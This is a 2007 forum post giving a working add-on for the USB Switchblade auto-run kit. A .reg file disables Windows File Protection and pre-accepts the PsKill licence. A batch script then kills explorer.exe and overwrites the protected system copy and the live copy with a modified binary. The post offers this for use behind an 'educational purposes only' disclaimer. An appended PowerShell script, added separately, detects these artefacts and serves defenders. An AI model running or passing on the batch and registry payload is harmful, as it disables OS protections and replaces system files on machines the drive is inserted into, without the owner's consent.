AndyzBong
Posted January 7, 2007

I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button.

NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue.

MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER!

You will need 4 things (these all go in WIPCMD):

1. A registry file to import a key that disables Windows File Protection
2. A modified version of explorer.exe
3. A batch file to delay time when copying the modified explorer
4. A copy of Pskill

First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "SFCDisable"=dword:000001

    [HKEY_CURRENT_USER\Software\Sysinternals\PsKill]
    "EulaAccepted"=dword:00000001

Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify its start button to whatever you want. Save the changes to explorer.exe.

Then create a batch file named blank.bat and a batch file named explorer.bat. Blank.bat will be blank (duh), and explorer.bat will have the following code:

    @echo off
    regedit.exe /s WIPCMD\wfpskill.reg
    pskill.exe explorer.exe
    RENAME C:\WINDOWS\system32\dllcache\explorer.exe explorer.bak
    COPY /y F:\WIPCMD\explorer.exe C:\WINDOWS\system32\dllcache
    TYPE NUL | F:\WIPCMD\blank.bat /N /CY /TY,5 >NUL
    COPY /y F:\WIPCMD\explorer.exe C:\WINDOWS
    C:\WINDOWS\explorer.exe
    exit

Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go.

This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries. Mad props to KarmikTrance.
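
A defender's check for the artefacts the post above leaves on a host, as an added example that is not part of the original post: it looks for the two registry values, the renamed dllcache copy, and an explorer.exe that differs from a trusted reference. The `$KnownGood` path and the `Get-Sha256` helper are assumptions made for this example; the code avoids newer cmdlets so it also runs on PowerShell 2.0.

```powershell
# Added defensive example, not code from the original post.
param(
    [string]$WinDir = $env:windir,
    # Assumption: trusted explorer.exe from the same OS build (placeholder path).
    [string]$KnownGood = 'D:\baseline\explorer.exe'
)

# Hypothetical helper: SHA-256 via .NET, so Get-FileHash (PowerShell 4+) is not needed.
function Get-Sha256([string]$Path) {
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { [BitConverter]::ToString($sha.ComputeHash($fs)) -replace '-', '' }
    finally { $fs.Close() }
}

$findings = @()

# 1. SFCDisable under Winlogon: any non-zero value is the WFP tampering from wfpskill.reg.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$sfc = (Get-ItemProperty -Path $winlogon -Name SFCDisable -ErrorAction SilentlyContinue).SFCDisable
if ($null -ne $sfc -and $sfc -ne 0) { $findings += "SFCDisable=$sfc under $winlogon" }

# 2. PsKill EULA value (weak signal alone: PsKill was run or pre-accepted for this user).
$pskill = 'HKCU:\Software\Sysinternals\PsKill'
$eula = (Get-ItemProperty -Path $pskill -Name EulaAccepted -ErrorAction SilentlyContinue).EulaAccepted
if ($eula -eq 1) { $findings += "EulaAccepted=1 under $pskill" }

# 3. The renamed protected copy that explorer.bat leaves in dllcache.
$bak = Join-Path $WinDir 'system32\dllcache\explorer.bak'
if (Test-Path $bak) { $findings += "Renamed cache copy present: $bak" }

# 4. Both explorer.exe locations the batch file overwrites, compared to the reference.
if (Test-Path $KnownGood) {
    $good = Get-Sha256 $KnownGood
    $targets = @((Join-Path $WinDir 'explorer.exe'),
                 (Join-Path $WinDir 'system32\dllcache\explorer.exe'))
    foreach ($p in $targets) {
        if ((Test-Path $p) -and ((Get-Sha256 $p) -ne $good)) {
            $findings += "Hash differs from reference: $p"
        }
    }
} else {
    Write-Warning "Reference copy not found at $KnownGood; hash comparison skipped."
}

if ($findings.Count -gt 0) { $findings | ForEach-Object { Write-Output "FINDING: $_" } }
else { Write-Output 'None of the artefacts described in the post were found.' }
```

A hash mismatch alone can also come from a legitimate update, so compare against a reference taken from the same patch level.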